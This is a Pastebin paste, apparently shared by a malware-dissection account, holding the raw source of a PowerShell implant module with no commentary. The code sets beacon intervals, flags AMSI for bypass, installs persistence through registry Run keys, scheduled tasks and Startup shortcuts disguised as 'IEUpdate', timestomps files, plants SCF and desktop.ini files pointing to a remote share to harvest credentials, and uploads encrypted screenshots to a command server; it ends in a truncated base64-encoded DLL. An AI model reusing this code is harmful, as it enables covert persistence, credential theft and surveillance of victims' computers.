dissectmalware

Malicious Powershell

Jul 27th, 2018
1,205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # malicious powershell
  2.  
  3. LoadModulefunction Test-Wow64() {
  4.     return (Test-Win32) -and (test-path env:\PROCESSOR_ARCHITEW6432)
  5. }
  6. function Test-Win64() {
  7.     return [IntPtr]::size -eq 8
  8. }
  9. function Test-Win32() {
  10.     return [IntPtr]::size -eq 4
  11. }
  12. Function Beacon($sleeptime) {
  13.     if ($sleeptime.ToLower().Contains('m')) {
  14.         $sleeptime = $sleeptime -replace 'm', ''
  15.         [int]$newsleep = $sleeptime
  16.         [int]$newsleep = $newsleep * 60
  17.     }
  18.     elseif ($sleeptime.ToLower().Contains('h')) {
  19.         $sleeptime = $sleeptime -replace 'h', ''
  20.         [int]$newsleep1 = $sleeptime
  21.         [int]$newsleep2 = $newsleep1 * 60
  22.         [int]$newsleep = $newsleep2 * 60
  23.     }
  24.     elseif ($sleeptime.ToLower().Contains('s')) {
  25.         $newsleep = $sleeptime -replace 's', ''
  26.     } else {
  27.         $newsleep = $sleeptime
  28.     }
  29.     $script:sleeptime = $newsleep
  30. }
  31. New-Alias SetBeacon Beacon
  32. Function Turtle($sleeptime) {
  33.     if ($sleeptime.ToLower().Contains('m')) {
  34.         $sleeptime = $sleeptime -replace 'm', ''
  35.         [int]$newsleep = $sleeptime
  36.         [int]$newsleep = $newsleep * 60
  37.     }
  38.     elseif ($sleeptime.ToLower().Contains('h')) {
  39.         $sleeptime = $sleeptime -replace 'h', ''
  40.         [int]$newsleep1 = $sleeptime
  41.         [int]$newsleep2 = $newsleep1 * 60
  42.         [int]$newsleep = $newsleep2 * 60
  43.     }
  44.     elseif ($sleeptime.ToLower().Contains('s')) {
  45.         $newsleep = $sleeptime -replace 's', ''
  46.     } else {
  47.         $newsleep = $sleeptime
  48.     }
  49.     Start-Sleep $newsleep
  50. }
  51. Function CheckArchitecture
  52. {
  53.     if (Test-Win64) {
  54.         Write-Output "64bit implant running on 64bit machine"
  55.     }
  56.     elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
  57.         Write-Output "32bit running on 32bit machine"
  58.     }
  59.     elseif ((Test-Win32) -and (Test-Wow64)) {
  60.         $global:ImpUpgrade = $True
  61.         Write-Output "32bit implant running on a 64bit machine, use StartAnotherImplant to upgrade to 64bit"
  62.     }
  63.     else {
  64.         Write-Output "Unknown Architecture Detected"
  65.     }
  66.     get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`n[+] AMSI Detected. Run Unhook-AMSI to unload Anti-Malware Scan Interface (AMSI)"} }
  67. }
  68. Function Get-Proxy {
  69.     Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
  70. }
  71. Function CheckVersionTwo
  72. {
  73.     $psver = $PSVersionTable.psversion.Major
  74.     if ($psver -ne '2') {
  75.         Write-Output "`n[+] Powershell version $psver detected. Run Inject-Shellcode with the v2 Shellcode"
  76.         Write-Output "[+] Warning AMSI, Constrained Mode, ScriptBlock/Module Logging could be enabled"
  77.     }
  78. }
  79. $global:ImpUpgrade = $False
  80. CheckArchitecture
  81. CheckVersionTwo
  82. Function StartAnotherImplant {
  83.     if (($p = Get-Process | ? {$_.id -eq $pid}).name -ne "powershell") {
  84.         echo "Process is not powershell, try running migrate -x86 or migrate -x64"
  85.     } else {
  86.         if ($global:ImpUpgrade) {
  87.             echo "Start-Process Upgrade via CMD"
  88.             start-process -windowstyle hidden cmd -args "/c `"$env:windir\sysnative\windowspowershell\v1.0\$payload`""
  89.         } else {
  90.             echo "Start-Process via CMD"
  91.             start-process -windowstyle hidden cmd -args "/c $payload"
  92.         }
  93.     }
  94. }
  95. sal S StartAnotherImplant
  96. sal SAI StartAnotherImplant
  97. sal invoke-smblogin invoke-smbexec
  98. Function Invoke-DowngradeAttack
  99. {
  100.     $payload = $payload -replace "-exec", "-v 2 -exec"
  101.     StartAnotherImplant
  102. }
  103. function Test-Administrator  
  104. {  
  105.     $user = [Security.Principal.WindowsIdentity]::GetCurrent();
  106.     (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)  
  107. }
  108. function Check-Command($cmdname)
  109. {
  110.     return [bool](Get-Command -Name $cmdname -ErrorAction SilentlyContinue)
  111.     $error.clear()
  112. }
  113. function EnableRDP
  114. {
  115.     if (Test-Administrator) {
  116.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
  117.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1  
  118.         $psver = $PSVersionTable.psversion.Major
  119.         if ($psver -ne '2')
  120.         {
  121.             Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled true
  122.         } else {
  123.             netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
  124.         }
  125.     } else {
  126.     Write-Output "You are not elevated to Administator "
  127.     }
  128. }
  129. function DisableRDP
  130. {
  131.     if (Test-Administrator) {
  132.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 1
  133.         set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 0
  134.         $psver = $PSVersionTable.psversion.Major
  135.         if ($psver -ne '2')
  136.         {
  137.             Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled false
  138.         } else {
  139.             netsh advfirewall firewall del rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
  140.         }
  141.     } else {
  142.     Write-Output "You are not elevated to Administator "
  143.     }
  144. }
  145. function Write-SCFFile
  146. {
  147.     Param ($IPaddress, $Location)
  148.     "[Shell]" >$Location\~T0P0092.jpg.scf
  149.     "Command=2" >> $Location\~T0P0092.jpg.scf;
  150.     "IconFile=\\$IPaddress\remote.ico" >> $Location\~T0P0092.jpg.scf;
  151.     "[Taskbar]" >> $Location\~T0P0092.jpg.scf;
  152.     "Command=ToggleDesktop" >> $Location\~T0P0092.jpg.scf;
  153.     Write-Output "Written SCF File: $Location\~T0P0092.jpg.scf"
  154. }
  155. function Write-INIFile
  156. {
  157.     Param ($IPaddress, $Location)
  158.     "[.ShellClassInfo]" > $Location\desktop.ini
  159.     "IconResource=\\$IPAddress\resource.dll" >> $Location\desktop.ini
  160.     $a = Get-item $Location\desktop.ini -Force; $a.Attributes="Hidden"
  161.     Write-Output "Written INI File: $Location\desktop.ini"
  162. }
  163. Function Install-Persistence
  164. {
  165.     Param ($Method)
  166.     if (!$Method){$Method=1}
  167.     if ($Method -eq 1) {
  168.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777 -value "$payload"
  169.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate -value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper777"
  170.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  171.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  172.         if (($registrykey.IEUpdate) -and ($registrykey2.Wallpaper777)) {
  173.         Write-Output "Successfully installed persistence: `n Regkey: HKCU\Software\Microsoft\Windows\currentversion\run\IEUpdate `n Regkey2: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper777"
  174.         } else {
  175.         Write-Output "Error installing persistence"
  176.         }
  177.     }
  178.     if ($Method -eq 2) {
  179.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555 -value "$payload"
  180.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  181.         schtasks.exe /create /sc minute /mo 240 /tn "IEUpdate" /tr "powershell -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper555"
  182.         If ($registrykey.Wallpaper555) {
  183.             Write-Output "Created scheduled task persistence every 4 hours"
  184.         }
  185.     }
  186.     if ($Method -eq 3) {
  187.         Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666 -value "$payload"
  188.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  189.         $SourceExe = "powershell.exe"
  190.         $ArgumentsToSourceExe = "-exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper666"
  191.         $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\IEUpdate.lnk"
  192.         $WshShell = New-Object -comObject WScript.Shell
  193.         $Shortcut = $WshShell.CreateShortcut($DestinationPath)
  194.         $Shortcut.TargetPath = $SourceExe
  195.         $Shortcut.Arguments = $ArgumentsToSourceExe
  196.         $Shortcut.WindowStyle = 7
  197.         $Shortcut.Save()
  198.         If ((Test-Path $DestinationPath) -and ($registrykey2.Wallpaper666)) {
  199.             Write-Output "Created StartUp folder persistence and added RegKey`n Regkey: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper666"
  200.         } else {
  201.             Write-Output "Error installing StartUp folder persistence"
  202.         }
  203.     }
  204. }
  205. Function InstallExe-Persistence() {
  206.         $SourceEXE = "rundll32.exe"
  207.         $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
  208.         $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
  209.         $WshShell = New-Object -comObject WScript.Shell
  210.         $Shortcut = $WshShell.CreateShortcut($DestinationPath)
  211.         $Shortcut.TargetPath = $SourceEXE
  212.         $Shortcut.Arguments = $ArgumentsToSourceExe
  213.         $Shortcut.WindowStyle = 7
  214.         $Shortcut.Save()
  215.         TimeStomp $DestinationPath "01/03/2008 12:12 pm"
  216.         If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
  217.             Write-Output "Created StartUp file Exe persistence: $DestinationPath"
  218.         } else {
  219.             Write-Output "Error installing StartUp Exe persistence"
  220.         }
  221. }
  222. Function RemoveExe-Persistence() {
  223.         $DestinationPath1 = "$env:Temp\winlogon.exe"
  224.         Remove-Item -Force $DestinationPath1
  225.         $DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
  226.         Remove-Item -Force $DestinationPath2
  227.         TimeStomp $DestinationPath "01/03/2008 12:12 pm"
  228.         If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
  229.             Write-Output "Unable to Remove Persistence"
  230.         } else {
  231.             Write-Output "Persistence Removed"
  232.         }
  233. }
  234. Function Remove-Persistence
  235. {
  236.     Param ($Method)
  237.     if (!$Method){$Method=1}
  238.     if ($Method -eq 1) {
  239.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  240.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  241.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
  242.         $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
  243.         if (($registrykey -eq $null) -and ($registrykey2 -eq $null)) {
  244.         Write-Output "Successfully removed persistence from registry!"
  245.         $error.clear()
  246.         } else {
  247.         Write-Output "Error removing persistence, remove registry keys manually!"
  248.         $error.clear()
  249.     }
  250.     if ($Method -eq 2) {
  251.         schtasks.exe /delete /tn IEUpdate /F
  252.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  253.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
  254.         if ($registrykey -eq $null) {
  255.             Write-Output "Successfully removed persistence from registry!"
  256.             Write-Output "Removed scheduled task persistence"
  257.         }else {
  258.             Write-Output "Error removing SchTasks persistence"
  259.         }
  260.     }
  261.     if ($Method -eq 3) {
  262.         Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  263.         $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
  264.         Remove-Item "$env:APPDATA\Microsoft\Windows\StartMenu\Programs\Startup\IEUpdate.lnk"
  265.         If ((Test-Path $DestinationPath) -and ($registrykey.Wallpaper666)) {
  266.             Write-Output "Removed StartUp folder persistence"
  267.         }else {
  268.             Write-Output "Error installing StartUp folder persistence"
  269.         }
  270.     }
  271. }
  272. }
  273. Function Web-Upload-File
  274. {
  275.     Param
  276.     (
  277.         [string]
  278.         $From,
  279.         [string]
  280.         $To
  281.     )
  282.     (Get-Webclient).DownloadFile($From,$To)
  283. }
  284. function Unzip($file, $destination)
  285. {
  286.     $shell = new-object -com shell.application
  287.     $zip = $shell.NameSpace($file)
  288.     foreach($item in $zip.items())
  289.     {
  290.         $shell.Namespace($destination).copyhere($item)
  291.     }
  292. }
  293. function ConvertFrom-Base64
  294. {
  295.     param
  296.     (
  297.         [string] $SourceFilePath,
  298.         [string] $TargetFilePath
  299.     )
  300.  
  301.     $SourceFilePath = Resolve-PathSafe $SourceFilePath
  302.     $TargetFilePath = Resolve-PathSafe $TargetFilePath
  303.  
  304.     $bufferSize = 90000
  305.     $buffer = New-Object char[] $bufferSize
  306.      
  307.     $reader = [System.IO.File]::OpenText($SourceFilePath)
  308.     $writer = [System.IO.File]::OpenWrite($TargetFilePath)
  309.      
  310.     $bytesRead = 0
  311.     do
  312.     {
  313.         $bytesRead = $reader.Read($buffer, 0, $bufferSize);
  314.         $bytes = [Convert]::FromBase64CharArray($buffer, 0, $bytesRead);
  315.         $writer.Write($bytes, 0, $bytes.Length);
  316.     } while ($bytesRead -eq $bufferSize);
  317.      
  318.     $reader.Dispose()
  319.     $writer.Dispose()
  320. }
  321. Function Test-ADCredential
  322. {
  323.     Param($username, $password, $domain)
  324.     Add-Type -AssemblyName System.DirectoryServices.AccountManagement
  325.     $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
  326.     $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
  327.     $object = New-Object PSObject | Select Username, Password, IsValid
  328.     $object.Username = $username;
  329.     $object.Password = $password;
  330.     $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
  331.     return $object
  332. }
  333. Function Get-ScreenshotMulti {
  334.     param($Timedelay, $Quantity)
  335.  
  336.     if ($Quantity -and $Timedelay) {
  337.         ForEach ($number in 1..[int]$Quantity ) {
  338.             $Output = Get-Screenshot        
  339.             $Output = Encrypt-String2 $key $Output
  340.             $UploadBytes = getimgdata $Output
  341.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  342.             Start-Sleep $Timedelay
  343.         }
  344.     }
  345. }
  346. Function Get-Screenshot
  347. {
  348.     param($File)
  349.  
  350.     #import libraries
  351.     Add-Type -AssemblyName System.Windows.Forms
  352.     Add-type -AssemblyName System.Drawing
  353.  
  354.     # Gather Screen resolution information
  355.     $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
  356.     $Width = $Screen.Width
  357.     $Height = $Screen.Height
  358.     $Left = $Screen.Left
  359.     $Top = $Screen.Top
  360.  
  361.     # Create bitmap using the top-left and bottom-right bounds
  362.     $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
  363.  
  364.     # Create Graphics object
  365.     $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
  366.  
  367.     # Capture screen
  368.     $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
  369.  
  370.     # Send back as base64
  371.     $msimage = New-Object IO.MemoryStream
  372.    
  373.     if ($File) {
  374.         $bitmap.save($file, "png")
  375.     } else {
  376.         $bitmap.save($msimage, "png")
  377.         $b64 = [Convert]::ToBase64String($msimage.toarray())
  378.     }
  379.     return $b64
  380. }
  381. $psloadedscreen = $null
  382. function Get-ScreenshotAllWindows {
  383.  
  384.     if ($psloadedscreen -ne "TRUE") {
  385.         $script:psloadedscreen = "TRUE"
  386.         $ps = "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AFZhbHVlVHlwZQBDYXB0dXJlAEVudW1XaW5kb3dTdGF0aW9uc0RlbGVnYXRlAEVudW1EZXNrdG9wc0RlbGVnYXRlAEVudW1EZXNrdG9wV2luZG93c0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkRyYXdpbmcAZ2V0X1dpZHRoAG5XaWR0aAB3aWR0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAGdkaTMyLmRsbABVc2VyMzIuZGxsAHVzZXIzMi5kbGwAU2NyZWVuc2hvdC5kbGwAbFBhcmFtAFN5c3RlbQBCb3R0b20AU2NyZWVuAENhcHR1cmVSZWdpb24AcmVnaW9uAFVuaW9uAHdpblN0YXRpb24Ad2luZG93c1N0YXRpb24AQ2xvc2VXaW5kb3dTdGF0aW9uAE9wZW5XaW5kb3dTdGF0aW9uAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAARnJvbUhiaXRtYXAAZHdSb3AAZ2V0X1RvcABDYXB0dXJlRGVza3RvcABDbG9zZURlc2t0b3AAaERlc2t0b3AAT3BlbkRlc2t0b3AAT3BlbklucHV0RGVza3RvcABkZXNrdG9wAFN0cmluZ0J1aWxkZXIAaHduZENoaWxkQWZ0ZXIALmN0b3IAR3JhcGhpY3MAR2V0U3lzdGVtTWV0cmljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X0JvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBuRmxhZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAZ2V0X0FsbFNjcmVlbnMARW51bVdpbmRvd1N0YXRpb25zAEVudW1EZXNrdG9wcwBscHN6Q2xhc3MAbmVlZEFjY2VzcwBFbnVtRGVza3RvcFdpbmRvd3MAR2V0V2luZG93UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAb2JqZWN0AHJlY3QAZ2V0X0xlZnQAUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AGZJbmhlcml0AEJpdEJsdABJQXN5bmNSZXN1bHQAcmVzdWx0AGh3bmRQYXJlbnQAbk1heENvdW50AFNjcmVlbnNob3QAaGRjRGVzdABueERlc3QAbnlEZXN0AFN5c3RlbS5UZXh0AGxwV2luZG93VGV4dABHZXRXaW5kb3dUZXh0AEZpbmRXaW5kb3cAR2V0RGVza3RvcFdpbmRvdwBQcmludFdpbmRvdwBscHN6V2luZG93AEZpbmRXaW5kb3dFeAB3b3JraW5nQXJlYU9ubHkARW1wdHkAAAAAAMgUTmDMAYJGtc9up0YeCB0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYGBgYEkEDIAAIBQABEkEYCgcE